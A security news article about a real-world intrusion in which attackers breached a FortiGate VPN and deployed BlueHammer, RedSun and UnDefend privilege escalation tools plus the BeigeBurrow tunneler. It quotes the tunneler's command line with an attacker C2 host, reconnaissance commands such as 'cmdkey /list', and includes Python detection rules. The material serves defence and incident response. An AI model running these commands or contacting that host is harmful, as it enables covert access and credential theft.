Hackers deploy Nightmare-Eclipse privilege escalation tools after breaching FortiGate VPN

Security researchers have confirmed the first real-world deployment of Nightmare-Eclipse privilege escalation tools in an enterprise attack. The incident involved hackers who gained unauthorized access through a compromised FortiGate SSL VPN before deploying BlueHammer, RedSun, and UnDefend exploits against Windows Defender.

The attack represents a significant escalation in threat actor tactics, as it marks the first time these publicly available tools have been used in a live enterprise environment. This development, reported by Huntress, raises immediate concerns for security teams worldwide, particularly those managing Windows environments with FortiGate VPN infrastructure.

The Nightmare-Eclipse toolkit explained

The tools at the center of this attack were created by a security researcher known as Chaotic Eclipse or Nightmare-Eclipse. This pseudonymous figure became frustrated with Microsoft’s vulnerability disclosure process and publicly released several local privilege escalation exploits in retaliation.

The three main tools target logic flaws in Windows Defender’s privileged operations:

  • BlueHammer – Escalates unprivileged user accounts to SYSTEM-level access
  • RedSun – Provides similar privilege escalation capabilities
  • UnDefend – Disrupts Windows Defender security functions without requiring admin rights

Microsoft patched BlueHammer in its April 2026 Patch Tuesday update, assigning it CVE-2026-33825. However, RedSun and UnDefend remain unpatched zero-day vulnerabilities that work against fully updated Windows systems.

Attack timeline and initial breach

Huntress first detected suspicious activity on April 10, 2026, when a binary called FunnyApp.exe was executed from a victim’s Pictures folder. This file was pulled directly from the public BlueHammer GitHub repository and was quickly quarantined by Windows Defender.

The attack escalated on April 16, with investigators observing:

  • RedSun.exe execution from the Downloads directory
  • Multiple executions of undef.exe (UnDefend) from short two-letter subfolders
  • Misspelled command flags indicating operator inexperience

Customer VPN logs revealed the initial breach method. On April 15, 2026, an attacker used valid credentials to establish an SSL VPN connection to the victim’s FortiGate firewall from IP address 78.29.48.29, located in Russia. Subsequent unauthorized sessions originated from Singapore and Switzerland, suggesting credential sharing or resale.

The most dangerous component: BeigeBurrow

While the privilege escalation attempts largely failed, investigators identified a more concerning tool called BeigeBurrow. This Go-compiled Windows binary executed as ‘agent.exe -server staybud.dpdns.org:443 -hide’ and successfully established a persistent connection to attacker infrastructure.

BeigeBurrow uses HashiCorp’s Yamux multiplexing library to create a covert TCP relay over port 443, which enterprises rarely block. Unlike the other tools, this component achieved its intended purpose and has been observed in at least one other unrelated intrusion.

Security researchers also confirmed hands-on-keyboard attacker activity through post-exploitation commands including ‘whoami /priv’, ‘cmdkey /list’, and ‘net group’. Notably, one command was spawned directly from an M365Copilot.exe process, though investigators could not explain this anomaly.

Immediate security recommendations

Organizations should treat any execution of these binaries as high-priority incidents. Security teams should implement these immediate actions:

  • Apply patches – Install Microsoft’s April 2026 Patch Tuesday update to fix CVE-2026-33825
  • Hunt for artifacts – Search user-writable paths like Pictures and Downloads folders for suspicious binaries
  • Review VPN logs – Flag accounts authenticating from multiple countries within short timeframes
  • Monitor tunneling – Investigate any agent.exe executions with -server and -hide flags
  • Block infrastructure – Add staybud.dpdns.org to network blocklists
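The artifact-hunting, tunneling and VPN-review steps above can be turned into simple triage rules. The following is an added example written for this article, not Huntress's or the article's own code; it assumes a simplified process-execution and VPN-login record layout, and the sample records (including the placeholder C2 host) are constructed.

```python
# Added example (not Huntress's or the article's code): rule-based triage of
# process-execution and VPN-login records for the indicators described above.
# Record layout, regexes and every sample value are constructed assumptions.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LPE_NAMES = {"funnyapp.exe", "redsun.exe", "undef.exe"}   # binaries seen in the intrusion
USER_DIRS = ("\\pictures\\", "\\downloads\\")             # user-writable launch folders
TWO_LETTER_DIR = re.compile(r"\\[a-z]{2}\\[^\\]+$", re.I)  # e.g. ...\ab\undef.exe

def triage_process(image, cmdline):
    """Return the reasons a process-execution record should be escalated."""
    name = image.rsplit("\\", 1)[-1].lower()
    tokens = cmdline.lower().split()
    reasons = []
    if name == "agent.exe" and "-server" in tokens and "-hide" in tokens:
        reasons.append("tunneler: agent.exe launched with -server and -hide")
    if name in LPE_NAMES:
        reasons.append(f"known Nightmare-Eclipse tool: {name}")
        if any(d in image.lower() for d in USER_DIRS):
            reasons.append("launched from a user-writable folder")
        if name == "undef.exe" and TWO_LETTER_DIR.search(image):
            reasons.append("undef.exe inside a two-letter subfolder")
    return reasons

def multi_country_logins(events, window=timedelta(hours=24)):
    """Flag users with VPN logins from >1 country inside `window`; events = (ts, user, cc)."""
    by_user = defaultdict(list)
    for ts, user, country in sorted(events):
        by_user[user].append((ts, country))
    flagged = {}
    for user, logins in by_user.items():
        for i, (ts, _) in enumerate(logins):
            countries = {c for t, c in logins[i:] if t - ts <= window}
            if len(countries) > 1:          # sliding window over this user's logins
                flagged[user] = sorted(countries)
                break
    return flagged

# Constructed sample records; the C2 host is a placeholder, not the real one.
SAMPLE_PROCS = [
    (r"C:\Users\alice\Pictures\FunnyApp.exe", "FunnyApp.exe"),
    (r"C:\Users\alice\Downloads\ab\undef.exe", "undef.exe --disable"),
    (r"C:\ProgramData\agent.exe", "agent.exe -server c2.example.invalid:443 -hide"),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]
SAMPLE_VPN = [
    (datetime(2026, 4, 15, 9, 0), "alice", "RU"),
    (datetime(2026, 4, 15, 14, 30), "alice", "SG"),
    (datetime(2026, 4, 15, 10, 0), "bob", "US"),
]
```

Feed real EDR process events and VPN authentication logs into `triage_process` and `multi_country_logins` after mapping them onto the (image, cmdline) and (timestamp, user, country) shapes used here.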

This incident highlights how publicly available exploit tools can quickly transition from proof-of-concept to active threat. With two zero-day vulnerabilities still unpatched, organizations running Windows environments face continued risk until Microsoft releases additional security updates.